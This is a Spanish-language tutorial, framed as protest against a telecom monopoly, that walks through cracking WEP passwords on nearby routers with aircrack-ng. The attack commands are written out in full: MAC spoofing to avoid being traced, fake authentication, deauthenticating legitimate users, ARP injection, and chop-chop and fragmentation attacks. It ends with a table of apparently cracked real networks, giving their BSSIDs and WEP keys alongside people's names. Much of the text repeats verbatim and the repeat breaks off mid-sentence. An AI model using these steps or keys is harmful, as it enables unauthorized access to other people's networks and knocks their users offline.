INTERNET GRATIS CON LINUX - OTRA FORMA DE PROTESTAR UN MONOPOLIO CON MA L SERVICIO
Esto es una abreviación de mis metodos descubrir la clave wep. Perdón si dejé algo sin decir. Hago lo
mejor que puedo. Es importante aclarar que después de entender los conceptos del ataque puedes experimentar
con diferentes metodos. Creo que asi puedes ver el problema desde muchos ángulos y promueva la resolución de problemas y el pensamiento crítico.
Gracias al equipo de desarollo Aircrack-ng por este suite
leyendario y increible de programas para la \"auditoria\" inalámbrica. Sin eso, si siquiera podría
clasificarnos como unos simples script-kiddies por lo menos.
PARA FINES DE USO EDUCATIVO Y PARA DEMOSTRAR QUE HELLMEX es una compañia lamehuevos.
Un cosa para considerar. Porque HellMex no respeta los derechos de la comunidad en construir y
mantener su propia infraestructura libre como una red WiFi comunitaría. Porque a HellMex no le
interesa tu opinión solo el $$ y hace todo lo posible para acabar con la competencia que es bueno
para el consumidor. Señor Slim porque no te limites en el uso de canales de banda no licenciado
a 2 canales. Porque tiene que transmitir en todos los canales los aparatos InfiniGratis.
Pues es obvio: para causar interfencia a otras redes privadas aún cuando no estén en uso.
Ahora seguimos con la misión de regresar el internet a la gente y demostrar que tontos los técnicos
de HellMex reamente son.
Ahora empezamos nuestro primera hackeo script-kiddie aunque no puedas considerarlo un ataque spoon-fed!
Ustedes son mejor que los que usan el beini. Mucho mejor. Si claro, es más fácil el beini
como el guindoze cuando no hay problemas y si puedes hacerlo en windows con software propietario pero la idea
es aprender algo nuevo y conocer las herremientas que ya son parte del software libre y que te acostumbres a
usar la línea de comando que para mi es la forma más eficiente y directa de hacer las cosas y no dependes de
algún frontend o interfaz que oculta como funcionan las cosas por adentro y a fondo de tu sistema GNU/Linux.
Y al tener la clave vas a saber te dará más satisfacción de saber que te coste esfuerzo aprender y dedicar tiempo a aprender como lograrlo y que no fue solo un ejercicio en copia y pegar o apunta y clickear. Experimenta y ve otro tutoriales para saber todo de mucho.
Les recomendamos que bajes la más nueva versión de aircrack (1.1) en su código fuente en vez de bajar el paquetecdesde synaptic porque suelen ser exisitir versiones antiguas en los repositorios.
Bajalo en una carpeta como ~/src en tu directorio personal de home
Para instalarlo es refácil:
Cambiar al directorio en donde copiaste el aircrack
penguino@rf:~$ cd src/
Lo descomprime:
tar xzvf aircrack*
cd aircrack*
Para compilar:
make
Stripear símbolos de debugging:
make strip
* Para Instalar:
make install
* Para Desinstalar:
make uninstall
PRIMERO - Abre una consola (yakuake, konsole, xterm) y poner la tarjeta WiFi en modo monitor
1) Abre un terminal como el konsole de kde o yakuake y abre 4 terminales en pestaña o si usas xterm
busca en la ayuda como abrir pestañas o simplemente abre cuatro ventanas xterm.
2) En cada consola (ventana de emulador de consola) entra como modo superusuario asi:
sudo su
Pon tu contraseña. Incluye los comandos principales e opcionales y de todas las variaciones de los ataques
para tener a la mano una referencia para copiar y pegar
3) Abre un editor de textos y escriba todos los comandos de este tutorial en una ordén sequencial o según la
orden en que los vaya a ejecutar.
Ahora cambiate a la primera consola.
Activa el modo monitoreo de la tarjetaa wifi:
airmon-ng start NOMBRE_DE_INTERFAZ
El nombre de interfaz es wlan0 en mi caso, si tienes una tarjeta ralink será ra0
Para saber el nombre de tu interfaz conecta tu tarjeta wifi y pon:
iwconfig. Ahora el airmon crea un interfaz de monitoreo llamdado mon0 si tu tarjeta wifi es atheros
o rtl8187 y ra0 en el caso de una tarjeta ralink como los rt73 o rt2x00.
A mi me gusta repitir el comando otra vez para tener otro interfaz virtual con que trabajar como mon1.
Ahi debe de estar wlan0 o ra0 cuando pones iwconfig si se carga corectamente el módulo.
Si usas una tarjeta interna quizas ya va estar cargado. Si tienes uno interno
y quieres usar un adaptador wifi externo, es mejor descactivarlo el interno con
rmmod NOMBRE_DE_MODULO
y volver a conectar el adaptador usb. Esto es para que te de un nombre de interfaz
como wlan0 y no wlan1.
Es también más facil preparar tus comandos antes en un texto y simplemente copiar y pegar en la consola.
Luego eso te sirve cuando necesitas crackear muchas redes en menos tiempo.
Aveces lo que hago antes de todo es escañear o sea primero paso 2 luego paso 1 para tener una
idea de lo que hay en el aire pero no identifican las redes en donde dicen 54e que aparecen en la parte
columna donde dice WEP o WPA o sea la encripción del programa airodump-ng del paso 2.
ifconfig wlan0 up
iwlist wlan0 scanning o iwlist wlan0 scanning | less
TIP: Es una buena práctica cambiar tu dirección MAC con el comando macchanger si estas en modo
managed o en modo monitoreo para evitar que te puedan identificar despúes si descubran
de alguna forma que la MAC_DE_TU_TARJETA es la misma que estaba escañeando redes sin conectar
a alguna o la que conecto de manera falsa durante el ataque de crakeo WEP. Aunque es raro que
pase esto es bueno evitar que se detectan patrones en la existencias de ciertos macs no
autorizados en la red que pueden luego hacer que empleen metodos para rastrearte. Pero
no se asusten. Este proceso es costoso y requiere de varias herramientas caras.
De todos modos, ten cuidado. Puede haber alguien viendo. No deja rasros.
Puedes bajar una lista de macs o recopilar de un escaneo o wardrive con airodump-ng y usa uno
de estos en el comando macchanger - m MAC_DE_UNA_TARJETA_CUALQUIERA mon0
También su puede utilizar el comando
ifconfig NOMBRE_DE_INTERFAZ hw ether MAC_DE_UNA_TARJETA_CUALQUIERA
SEGUNDO - Escañear las redes que hay a tu alrededor.
airodump-ng mon0
o igual:
iwlist wlan0 scanning (primero haz: ifconfig wlan0 up si te dice que la interfaz no esta lista)
Esto es para ver lo que esta en el aire. A veces es mejor activar
este comando antes de todo para una idea rápido de las redes vulnerables.
Es con este comando con que normalmente se comunica tu gestor de red
en modo gráfico o el daemon wpa_supplicant con el cliente wpa_cli.
Nota si quieres ver si existen las nuevas redes en donde parecen 54e, 48e o 12e o lo que sea con
una estúpida e, uso el método airodump-ng para identificar el AP que se cree más chingón que los
demás. Esta característica de los AP nuevos de llama modo migratorio. Permite que se conecten
clientes que utiliza la encripción obsoleta conocido como wep junto con los clientes que utilizan wpa.
Estos Aps rechasan los ataque de fragmentación o chop-chop del CUARTO PASO.
Estas redes es un intento reciente a hacer la vida más díficil para los que quieren usar internet
prestado.
Pero en un momento verás que es fácil cambiar su idea de lo que es una red WiFi segura pero tiene
que ser más paciente para esperar un paquete de datos la red, especificamente un ARP para poder
reinyectar a la red y a veces tarda por tu posición física o porque no hay clientes conectados.
Si hay gente conectados los puedes desconectar y asi vuelven a conectar provacando un ARP pero no
lo he calado. Esto se llama deauntentificación de cliente o simplemte deauth y el comando esta
más abajo. (aireplay-ng -0 1 -a MAC_DEL_AP -c MAC_DE_TARJETA_DE_CLIENTE_A_BOTAR mon0)
El airodump-ng se pone después de poner tu tarjeta en modo monitor con:
airmon-ng start wlan0. como en el paso primero.
Luego decides cual AP quieres atacar para sacar su clave wep.
Apuntas en tu mente o en un papel la MAC_DEL_AP y del AP víctima, eL CANÁL y la essid del AP
o en el mismo editor de textos que abriste (kwrite, mousepad gedit).
Abre la plantilla de comandos
que creaste en #3 del primer paso. Reemplazar primero el ESSID, luego la MAC_DEL_AP y luego la MAC_DE_TU_TARJETA.
Es más facil reemplazar todas la instancias de los comandos importantes del texto plantilla que copiar y pegarlas cada uno por puno con los valores que apuntaste antes. Copea la VARIABLE del comando del texto por ejemplo MAC_DEL_AP y lo selecionaroials.
Ahora ve a edit (o Ctrl+R) y dale dos veces en la tecla Tab para llegar al campo de \"Replacemnent text\" y copea la variable MAC_DEL_AP que apuntase antes. También lo puedes copiar y pegar desde el resultado del comando:
\"iwlist wlan0 scanning\" o \"airodump-ng mon0\" desde una terninal. Dale en Replace.
Ahora ve a edit (o Ctrl+R) y dale dos veces en la tecla Tab para llegar al campo de \"Replacemnent text\" y
copea la variable MAC_DE_TU_TARJETA que apuntase antes. También lo puedes copiar y pegar desde el resultado del comando:
comando \"macchanger -s wlan0\" desde una terminal. Dale en Replace.
Selecciona la mac de tu tarjeta desde la salida
del comando . Ve a la plantilla y presiona Ctrl+R y pegalo en el campo de \"Replacement text\" y dale en Enter
con este comando sacas la mac de tu tarjeta:
macchanger -s NOMBRE_DE_INTERFAZ (en mi caso la interfaz es wlan0)
con y con este comando también te saca tu mac:
ifconfig NOMBRE_DE_INTERFAZ
Opcional:
Ahora desconecta tu tarjeta wifi o usar rmmod modulo_de_tu_tarjeta. En mi caso hago un
rmmod ath9k . Con el comando lsmod puedes identificar el nombre del módulo de tu tarjeta wifi.
Esto es para resetear todo y quitarte de problemas porque antes la tarjeta estaba brincado de
canál a canál (escañeado) y ahora quieres fijarla en un solo canál.
Igual puedes hacer un airmon-ng stop wlan0
airmon-ng start wlan0 CANAL (cambia canal por el canal del AP víctim)
vuelve a iniciar airodump pero esta vez con el parametro de CANAL y BSSID
airodump-ng -c CANAL --bssid MAC_DEL_AP -w capture mon0 (mon0 es el nombre de interfaz de monitoreo cuando pusiste el comando airmon-ng)
TERCER PASO . AUTENTICACION FALSA
Tienes que hacer una conexión falsa al punto de acceso para poder comunicar con la redes
víctima y tener una esperanza de éxito con los ataques de 0841, fragmentación, chop-chop
módo migración (54e), o inyección con o sin clientes más adelante. Acercate o vete explorando hasta lograr
tener la famosa carita feliz.
y tu maquina aparecerá en el airodump-ng.
aireplay-ng -1 6000 -o 1 -q 10 -e essid -a MAC_DEL_AP -h MAC_DE_TU_TARJETA mon0
Este se puede modificar pero lo usar especialmente para los modem de Hellmex.
El valor despés del paramero -1 (indica tipo de ataque), es el tiempo de espera.
Sepuede con algunos AP dejarlo en 1 en vez de 6000. Tienes que experimentar.
Opcional pero aveces necesario:
SI TE PONE DURO ESTE PASO hay varios posibilidad pero si estas bíen o suficiente
cerca al punto de acceso y todavía no te conectas es porque está activado el filtro mac
en el punto de acceso.
Esto es una medida de seguridad por medio de oscuridad que no sirve para nada. Es basicamente
una lista de acceso para los que pueden conectar o los que no pueden. Le ganas al sistema
simplemente cambiando la MAC de tu tarjeta. Puede ser también que configuró esta lista para que
solamente el usuario legitamo pudiera conectar. En ese caso lo botas su propio punto de acceso o
sea lo desconectas sin piedad con el siguiente comando y luego vuelves a hacer el comando para
la conexión falsa.
< Deauth o Deautenticación de cliente >
Usa esta tecnica cuando en el AIRODUMP-NG te muestra la MAC DE alguien esta jodiendo y
esta usando el filtro mac de su router para bloquear todos menos el.
Por ejemplo, si tratas te conectar con la MAC de tu tarjeta o otra MAC finjida por el
comando macchanger no te puedes conectar pero espera, es fácil. Tienes que desconectar
el cliente de la red y entrar tu COMO EL.
Primero abre otra consola (en mi caso uso yakuake, abro otra pestaña) con el comando
macchanger - m MAC_DE_TARJETA_DE_CLIENTE_A_BOTAR mon0
tal vez sea necesario primero hacer ifconfig mon0 down si te da un error por estar en uso
la interfaz mon0. Ahora tiene la misma MAC del clientes que estas a punto de desconectar
de la red.
Entonces con el siguiente comando botas el cliente de la víctima actualmente conectado!
Hay que divertido, no! Acuerdate que tu siempres estas en control.
Todas las redes are belong to you! Y nadie te puede detener!
Ahora esperas con el siguiente comando (Deauth) ya copiado en otra ventana o pestaña de
terminal y en otro terminal pones el comando para conexión falsa listo para darle en enter.
Ahora checas en la pestaña o ventana en donde está corriendo el airodump-ng del paso dos
(asegurando que este en el canál del AP con el parametro --bssid para solo mostrar el punto de acceso víctima)
y dile adios a tu amigo víctima y rezar y esperar que en ese momento no esté enviando o
descargando algo importante.
Deauth:
aireplay-ng -0 1 -a MAC_DEL_AP -c MAC_DE_TARJETA_DE_CLIENTE_A_BOTAR mon0
Después de enviar un deauth se ve que esta perdiendo cientos de paquetes en el airodump y termina desconectadose de la red. Bueno en verdad es el cliente víctima que esta perdiendo los paquetes!!!
Reconecta con la MAC del cliente víctima un segundo despues que se vea que el cliente víctima
se desconecto)
aireplay-ng -1 0 -e ESSID –a MAC_DEL_AP -h MAC_DE_TU_TARJETA mon0
Ahora ya conectaste so no empieza de nuevo. Dale en la flecha arriba en cada venta en donde pusiste el
los comandos y vuelven aparecer de la historial de comandos.
<<<TERCER PASO>>> Escoja un ataque de A, B, C, D, o E
A) < METODO 0842 - TAN Eaasy!!! TAN FACIL !!! >
Antes de todo ahora es tan facil inyectar que tal vez no sea necesario usar el ataque de
fragmentación o el chop chop.
Se llama el ataque 0841 y simplifica un chingo el proceso de aumentar el tráfico de
la red por medio de inyeción utilando solo un paquete broadcast. Es automático
y te brinca directamente a paso cuatro.
aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b MAC_DEL_AP -h 00:25:d3:e3:f5:42 mon0
o si el punto de acceso te muestra 54e o algo similar que indica que el punto de acesso
trabaja en modo de migración utiliza el siguiente comando que es similar al Client-mode
Arp replay o reproducción de ARP en modo cliente. Esperas y cuando te pregunta si quieres
aceptar el paquete le das en S(i). Aveces tarda y con el ataque de modo migración aveces
nunca saled pero es porque estas muy lejos pero aveces cuando estas a punto de darte por
vencido, empieza a inyectar paquete y se ven los datos subir en el airodump.
En ese flujo de datos que contiene todos esos IV es lo que permite al aircrack-ng a sacar
la clave atravez de una prueba estadistical que determina cada byte de la clave con 100%
de exactitud y con menos de 25000 IVS en la mayoria de los casos.
B) < Modo Migración 54e > Usalo en vez del ataque de fragmentación o chop chop para redes 54e
aireplay-ng -8 -b MAC_DEL_AP -h MAC_DE_TU_TARJETA mon0
C) < Ataque de Modo Cliente de Reproducción Arp (o Client Mode Arp Replay Attack) >
(Usa lo si hay clientes conectados y dale en si cuando te llega un ARP)
aireplay-ng -3 -b MAC_DEL_AP -h 00:25:d3:e3:f5:42 mon0
D) < Ataque de Fragmentación >
Tiene la ventaja ser el más rápido para sacar el PRGA para luego utilizar en la generación de un paquete ARP a inyectar luego con el aireplay-ng. Nota: borra los archivos fragment anteriores con rm fragment-*
aireplay-ng -5 -b MAC_DEL_AP -h 00:25:d3:e3:f5:42 mon0
Luego generas un paquete arp con el sigiente comando:
packetforge-ng -0 -a MAC_DEL_AP -h 00:25:d3:e3:f5:42 -k 255.255.255.255 -l 255.255.255.255 -y fragment-*.xor -w arp-request
Es exitóso cuando termina el proceso diciendo que se escribo el archivo fragment-*.xor
Pero aveces no funciona porque tienes que estar más cerca para que funcione el ataque fragmentación.
E) < Ataque Chop-chop >
El comando chop chop tarda más pero siempre logra el resultado para mi al menos y
es más emocionante ver el contador contar hasta 100 indicando que el siguiente
es como pan comido y puedes empezar a celebrar porque en poco tiempo serás el nuevo
dueño de un enrutador infinutum con acceso total en 99% de los casos. Lo primero
que hago yo al tener acceso es, ah espera todavía no terminamos!!!
Nota: borra los archivos replay_dec anteriores con rm replay_*. (Truco: Después de rm teclee las primeras 2 o 3 letras de replay_dec, luego Tab para completar y un asterisko y enter para borrar todos los archivos
replay_dec.
Si no borras los replay_dec la próxima vez que ejecutas el ataque van a ser 2 archivos replay_dec y el
siguiente comando packetforge-ng no va poder determinar cual es e archivo que debe abrir y debido al asterisk va a abrir el primer archivo replay_dec en orden alfabético.
aireplay-ng -4 -h 00:25:d3:e3:f5:42 -b MAC_DEL_AP mon0
Luego generas un paquete arp con el sigiente comando:
packetforge-ng -0 -a MAC_DEL_AP -h 00:25:d3:e3:f5:42 -k 255.255.255.255 -l 255.255.255.255 -y replay_dec*.xor -w arp-request
CUARTO PASO - INYECCIÓN DE ARP
En este paso vas a inyectar el paquete que generaste el paso 3 en los ataque de D o E o sea el
ataque de fragmentación o el chop-chop, respectivamente.
aireplay-ng -2 -r arp-request mon0
Verás en el airodump-ng que rapidamente suben los data. Eso es precicamente lo que queremos.
Esperamos a que llega esta cifra a 200000 mas o menos y pasamos último paso con aircrack-ng
Nota: a mi me gusta usar un segundo interfaz virtual que puedes crear en paso dos con
airmon-ng start wlan0 CANAL
QUINTO PASO: CRAKEAR LA CLAVE
En otra ventana de terminal pon
aircrack-ng -b MAC_DEL_AP -z capture*.cap
Si estas crakiendo una red 54e usa el siguiente comando:
aircrack-ng -a 1 -b MAC_DEL_AP -z capture*.cap
Eso fuerza al programa en un modo de solo considerar los paquetes WEP
En el caso de WPA-PSK utilizas 2 en vez de 1 después del parametro -a
El uso de ese parametro en para otro tutorial!
KEY FOUND!!!!!!!!!
FELICIDADES YA SACASTE LA CLAVE
SEXTO PASO - La Conexión Ininicia
Ahora vete a tu gestor de red como wicd
y llena el campo de IP estático con uno que esté fuero del rango de DHCP
como 192.168.1.7 (7 por la suerte). Dale en tab (en wicd) y se llena
el subnet mask automaticamente.
Dale otro enter y llenas el campo de puerto de enlace.
Solo cambias el 1 en 192.168.1.1 a 254 para que se vea así:
192.168.1.254.
Ve a Settings > Advances Settings y la sección de Global DNS Servers,
selecciona la casilla de Use global DNS Servers.
Llena los campos de DNS Server 1 y DNS Server 2 así con los IP de OpenDNS así:
DNS Server 1: 208.67.222.222
DNS Server 2: 208.67.220.220
Dale en OK y conectate.
PROXIMAMENTE COMO USAR EL PROGRAMA KARMA
ESSID MAC CH ENC KEY
terminal
INFINITUM5681 00:1E:C7:2F:9A:61 11 WEP 7635354966 (ASCII: v55If
estafeta
INFINITUM3190 00:21:7C:CD:B4:61 11 WEP 0270783530
floreros
INFINITUMC1A958 00:24:17:BB:94
7 11 WEP 568F87CDC3
INFINITUM069a 64:16:F0:30:F6:15 1 WEP 6534373130 (ASCII: e4710 )
INFINITUMECA48E 64:16:F0:30:F6:15 11 WEP A8D2012637
INFINITUM57E1D0 00:26:44:65:B0:33 6 WEP 34F65EC573
INFINITUM651782 00:26:44:0D:2F:01 11 WEP 6E0F5755B3
INFINITUM4890 00:1F:B3:8E:58:E1 4 WEP
INFINITUMA6BC5D 00:26:44:5D:1A:8D 1 WEP
INFINITUM7b22 00:25:68:23:12:4C 1 WEP 3138383631 ASCII: 18861
INFINITUM7218 00:21:7C:C1:56:A1 2 WEP 7209098958
INFINITUM5584 00:21:7C:73:28:E1 11 WEP 4231722656 ] (ASCII: B1r&V
francisca chavez 3
diego amigo de florero
INFINITUMd75e 4C:54:99:37:AC:F5 6 WEP 3863636361 ] (ASCII: 8ccca )
mejor que puedo. Es importante aclarar que después de entender los conceptos del ataque puedes experimentar
con diferentes metodos. Creo que asi puedes ver el problema desde muchos ángulos y promueva la resolución de problemas y el pensamiento crítico.
Gracias al equipo de desarollo Aircrack-ng por este suite
leyendario y increible de programas para la \"auditoria\" inalámbrica. Sin eso, si siquiera podría
clasificarnos como unos simples script-kiddies por lo menos.
PARA FINES DE USO EDUCATIVO Y PARA DEMOSTRAR QUE HELLMEX es una compañia lamehuevos.
Un cosa para considerar. Porque HellMex no respeta los derechos de la comunidad en construir y
mantener su propia infraestructura libre como una red WiFi comunitaría. Porque a HellMex no le
interesa tu opinión solo el $$ y hace todo lo posible para acabar con la competencia que es bueno
para el consumidor. Señor Slim porque no te limites en el uso de canales de banda no licenciado
a 2 canales. Porque tiene que transmitir en todos los canales los aparatos InfiniGratis.
Pues es obvio: para causar interfencia a otras redes privadas aún cuando no estén en uso.
Ahora seguimos con la misión de regresar el internet a la gente y demostrar que tontos los técnicos
de HellMex reamente son.
Ahora empezamos nuestro primera hackeo script-kiddie aunque no puedas considerarlo un ataque spoon-fed!
Ustedes son mejor que los que usan el beini. Mucho mejor. Si claro, es más fácil el beini
como el guindoze cuando no hay problemas y si puedes hacerlo en windows con software propietario pero la idea
es aprender algo nuevo y conocer las herremientas que ya son parte del software libre y que te acostumbres a
usar la línea de comando que para mi es la forma más eficiente y directa de hacer las cosas y no dependes de
algún frontend o interfaz que oculta como funcionan las cosas por adentro y a fondo de tu sistema GNU/Linux.
Y al tener la clave vas a saber te dará más satisfacción de saber que te coste esfuerzo aprender y dedicar tiempo a aprender como lograrlo y que no fue solo un ejercicio en copia y pegar o apunta y clickear. Experimenta y ve otro tutoriales para saber todo de mucho.
Les recomendamos que bajes la más nueva versión de aircrack (1.1) en su código fuente en vez de bajar el paquetecdesde synaptic porque suelen ser exisitir versiones antiguas en los repositorios.
Bajalo en una carpeta como ~/src en tu directorio personal de home
Para instalarlo es refácil:
Cambiar al directorio en donde copiaste el aircrack
penguino@rf:~$ cd src/
Lo descomprime:
tar xzvf aircrack*
cd aircrack*
Para compilar:
make
Stripear símbolos de debugging:
make strip
* Para Instalar:
make install
* Para Desinstalar:
make uninstall
PRIMERO - Abre una consola (yakuake, konsole, xterm) y poner la tarjeta WiFi en modo monitor
1) Abre un terminal como el konsole de kde o yakuake y abre 4 terminales en pestaña o si usas xterm
busca en la ayuda como abrir pestañas o simplemente abre cuatro ventanas xterm.
2) En cada consola (ventana de emulador de consola) entra como modo superusuario asi:
sudo su
Pon tu contraseña. Incluye los comandos principales e opcionales y de todas las variaciones de los ataques
para tener a la mano una referencia para copiar y pegar
3) Abre un editor de textos y escriba todos los comandos de este tutorial en una ordén sequencial o según la
orden en que los vaya a ejecutar.
Ahora cambiate a la primera consola.
Activa el modo monitoreo de la tarjetaa wifi:
airmon-ng start NOMBRE_DE_INTERFAZ
El nombre de interfaz es wlan0 en mi caso, si tienes una tarjeta ralink será ra0
Para saber el nombre de tu interfaz conecta tu tarjeta wifi y pon:
iwconfig. Ahora el airmon crea un interfaz de monitoreo llamdado mon0 si tu tarjeta wifi es atheros
o rtl8187 y ra0 en el caso de una tarjeta ralink como los rt73 o rt2x00.
A mi me gusta repitir el comando otra vez para tener otro interfaz virtual con que trabajar como mon1.
Ahi debe de estar wlan0 o ra0 cuando pones iwconfig si se carga corectamente el módulo.
Si usas una tarjeta interna quizas ya va estar cargado. Si tienes uno interno
y quieres usar un adaptador wifi externo, es mejor descactivarlo el interno con
rmmod NOMBRE_DE_MODULO
y volver a conectar el adaptador usb. Esto es para que te de un nombre de interfaz
como wlan0 y no wlan1.
Es también más facil preparar tus comandos antes en un texto y simplemente copiar y pegar en la consola.
Luego eso te sirve cuando necesitas crackear muchas redes en menos tiempo.
Aveces lo que hago antes de todo es escañear o sea primero paso 2 luego paso 1 para tener una
idea de lo que hay en el aire pero no identifican las redes en donde dicen 54e que aparecen en la parte
columna donde dice WEP o WPA o sea la encripción del programa airodump-ng del paso 2.
ifconfig wlan0 up
iwlist wlan0 scanning o iwlist wlan0 scanning | less
TIP: Es una buena práctica cambiar tu dirección MAC con el comando macchanger si estas en modo
managed o en modo monitoreo para evitar que te puedan identificar despúes si descubran
de alguna forma que la MAC_DE_TU_TARJETA es la misma que estaba escañeando redes sin conectar
a alguna o la que conecto de manera falsa durante el ataque de crakeo WEP. Aunque es raro que
pase esto es bueno evitar que se detectan patrones en la existencias de ciertos macs no
autorizados en la red que pueden luego hacer que empleen metodos para rastrearte. Pero
no se asusten. Este proceso es costoso y requiere de varias herramientas caras.
De todos modos, ten cuidado. Puede haber alguien viendo. No deja rasros.
Puedes bajar una lista de macs o recopilar de un escaneo o wardrive con airodump-ng y usa uno
de estos en el comando macchanger - m MAC_DE_UNA_TARJETA_CUALQUIERA mon0
También su puede utilizar el comando
ifconfig NOMBRE_DE_INTERFAZ hw ether MAC_DE_UNA_TARJETA_CUALQUIERA
SEGUNDO - Escañear las redes que hay a tu alrededor.
airodump-ng mon0
o igual:
iwlist wlan0 scanning (primero haz: ifconfig wlan0 up si te dice que la interfaz no esta lista)
Esto es para ver lo que esta en el aire. A veces es mejor activar
este comando antes de todo para una idea rápido de las redes vulnerables.
Es con este comando con que normalmente se comunica tu gestor de red
en modo gráfico o el daemon wpa_supplicant con el cliente wpa_cli.
Nota si quieres ver si existen las nuevas redes en donde parecen 54e, 48e o 12e o lo que sea con
una estúpida e, uso el método airodump-ng para identificar el AP que se cree más chingón que los
demás. Esta característica de los AP nuevos de llama modo migratorio. Permite que se conecten
clientes que utiliza la encripción obsoleta conocido como wep junto con los clientes que utilizan wpa.
Estos Aps rechasan los ataque de fragmentación o chop-chop del CUARTO PASO.
Estas redes es un intento reciente a hacer la vida más díficil para los que quieren usar internet
prestado.
Pero en un momento verás que es fácil cambiar su idea de lo que es una red WiFi segura pero tiene
que ser más paciente para esperar un paquete de datos la red, especificamente un ARP para poder
reinyectar a la red y a veces tarda por tu posición física o porque no hay clientes conectados.
Si hay gente conectados los puedes desconectar y asi vuelven a conectar provacando un ARP pero no
lo he calado. Esto se llama deauntentificación de cliente o simplemte deauth y el comando esta
más abajo. (aireplay-ng -0 1 -a MAC_DEL_AP -c MAC_DE_TARJETA_DE_CLIENTE_A_BOTAR mon0)
El airodump-ng se pone después de poner tu tarjeta en modo monitor con:
airmon-ng start wlan0. como en el paso primero.
Luego decides cual AP quieres atacar para sacar su clave wep.
Apuntas en tu mente o en un papel la MAC_DEL_AP y del AP víctima, eL CANÁL y la essid del AP
o en el mismo editor de textos que abriste (kwrite, mousepad gedit).
Abre la plantilla de comandos
que creaste en #3 del primer paso. Reemplazar primero el ESSID, luego la MAC_DEL_AP y luego la MAC_DE_TU_TARJETA.
Es más facil reemplazar todas la instancias de los comandos importantes del texto plantilla que copiar y pegarlas cada uno por puno con los valores que apuntaste antes. Copea la VARIABLE del comando del texto por ejemplo MAC_DEL_AP y lo selecionaroials.
Ahora ve a edit (o Ctrl+R) y dale dos veces en la tecla Tab para llegar al campo de \"Replacemnent text\" y copea la variable MAC_DEL_AP que apuntase antes. También lo puedes copiar y pegar desde el resultado del comando:
\"iwlist wlan0 scanning\" o \"airodump-ng mon0\" desde una terninal. Dale en Replace.
Ahora ve a edit (o Ctrl+R) y dale dos veces en la tecla Tab para llegar al campo de \"Replacemnent text\" y
copea la variable MAC_DE_TU_TARJETA que apuntase antes. También lo puedes copiar y pegar desde el resultado del comando:
comando \"macchanger -s wlan0\" desde una terminal. Dale en Replace.
Selecciona la mac de tu tarjeta desde la salida
del comando . Ve a la plantilla y presiona Ctrl+R y pegalo en el campo de \"Replacement text\" y dale en Enter
con este comando sacas la mac de tu tarjeta:
macchanger -s NOMBRE_DE_INTERFAZ (en mi caso la interfaz es wlan0)
con y con este comando también te saca tu mac:
ifconfig NOMBRE_DE_INTERFAZ
Opcional:
Ahora desconecta tu tarjeta wifi o usar rmmod modulo_de_tu_tarjeta. En mi caso hago un
rmmod ath9k . Con el comando lsmod puedes identificar el nombre del módulo de tu tarjeta wifi.
Esto es para resetear todo y quitarte de problemas porque antes la tarjeta estaba brincado de
canál a canál (escañeado) y ahora quieres fijarla en un solo canál.
Igual puedes hacer un airmon-ng stop wlan0
airmon-ng start wlan0 CANAL (cambia canal por el canal del AP víctim)
vuelve a iniciar airodump pero esta vez con el parametro de CANAL y BSSID
airodump-ng -c CANAL --bssid MAC_DEL_AP -w capture mon0 (mon0 es el nombre de interfaz de monitoreo cuando pusiste el comando airmon-ng)
TERCER PASO . AUTENTICACION FALSA
Tienes que hacer una conexión falsa al punto de acceso para poder comunicar con la redes
víctima y tener una esperanza de éxito con los ataques de 0841, fragmentación, chop-chop
módo migración (54e), o inyección con o sin clientes más adelante. Acercate o vete explorando hasta lograr
tener la famosa carita feliz.
y tu maquina aparecerá en el airodump-ng.aireplay-ng -1 6000 -o 1 -q 10 -e essid -a MAC_DEL_AP -h MAC_DE_TU_TARJETA mon0
Este se puede modificar pero lo usar especialmente para los modem de Hellmex.
El valor despés del paramero -1 (indica tipo de ataque), es el tiempo de espera.
Sepuede con algunos AP dejarlo en 1 en vez de 6000. Tienes que experimentar.
Opcional pero aveces necesario:
SI TE PONE DURO ESTE PASO hay varios posibilidad pero si estas bíen o suficiente
cerca al punto de acceso y todavía no te conectas es porque está activado el filtro mac
en el punto de acceso.
Esto es una medida de seguridad por medio de oscuridad que no sirve para nada. Es basicamente
una lista de acceso para los que pueden conectar o los que no pueden. Le ganas al sistema
simplemente cambiando la MAC de tu tarjeta. Puede ser también que configuró esta lista para que
solamente el usuario legitamo pudiera conectar. En ese caso lo botas su propio punto de acceso o
sea lo desconectas sin piedad con el siguiente comando y luego vuelves a hacer el comando para
la conexión falsa.
< Deauth o Deautenticación de cliente >
Usa esta tecnica cuando en el AIRODUMP-NG te muestra la MAC DE alguien esta jodiendo y
esta usando el filtro mac de su router para bloquear todos menos el.
Por ejemplo, si tratas te conectar con la MAC de tu tarjeta o otra MAC finjida por el
comando macchanger no te puedes conectar pero espera, es fácil. Tienes que desconectar
el cliente de la red y entrar tu COMO EL.
Primero abre otra consola (en mi caso uso yakuake, abro otra pestaña) con el comando
macchanger - m MAC_DE_TARJETA_DE_CLIENTE_A_BOTAR mon0
tal vez sea necesario primero hacer ifconfig mon0 down si te da un error por estar en uso
la interfaz mon0. Ahora tiene la misma MAC del clientes que estas a punto de desconectar
de la red.
Entonces con el siguiente comando botas el cliente de la víctima actualmente conectado!
Hay que divertido, no! Acuerdate que tu siempres estas en control.
Todas las redes are belong to you! Y nadie te puede detener!
Ahora esperas con el siguiente comando (Deauth) ya copiado en otra ventana o pestaña de
terminal y en otro terminal pones el comando para conexión falsa listo para darle en enter.
Ahora checas en la pestaña o ventana en donde está corriendo el airodump-ng del paso dos
(asegurando que este en el canál del AP con el parametro --bssid para solo mostrar el punto de acceso víctima)
y dile adios a tu amigo víctima y rezar y esperar que en ese momento no esté enviando o
descargando algo importante.
Deauth:
aireplay-ng -0 1 -a MAC_DEL_AP -c MAC_DE_TARJETA_DE_CLIENTE_A_BOTAR mon0
Después de enviar un deauth se ve que esta perdiendo cientos de paquetes en el airodump y termina desconectadose de la red. Bueno en verdad es el cliente víctima que esta perdiendo los paquetes!!!
Reconecta con la MAC del cliente víctima un segundo despues que se vea que el cliente víctima
se desconecto)
aireplay-ng -1 0 -e ESSID –a MAC_DEL_AP -h MAC_DE_TU_TARJETA mon0
Ahora ya conectaste so no empieza de nuevo. Dale en la flecha arriba en cada venta en donde pusiste el
los comandos y vuelven aparecer de la historial de comandos.
<<<TERCER PASO>>> Escoja un ataque de A, B, C, D, o E
A) < METODO 0842 - TAN Eaasy!!! TAN FACIL !!! >
Antes de todo ahora es tan facil inyectar que tal vez no sea necesario usar el ataque de
fragmentación o el chop chop.
Se llama el ataque 0841 y simplifica un chingo el proceso de aumentar el tráfico de
la red por medio de inyeción utilando solo un paquete broadcast. Es automático
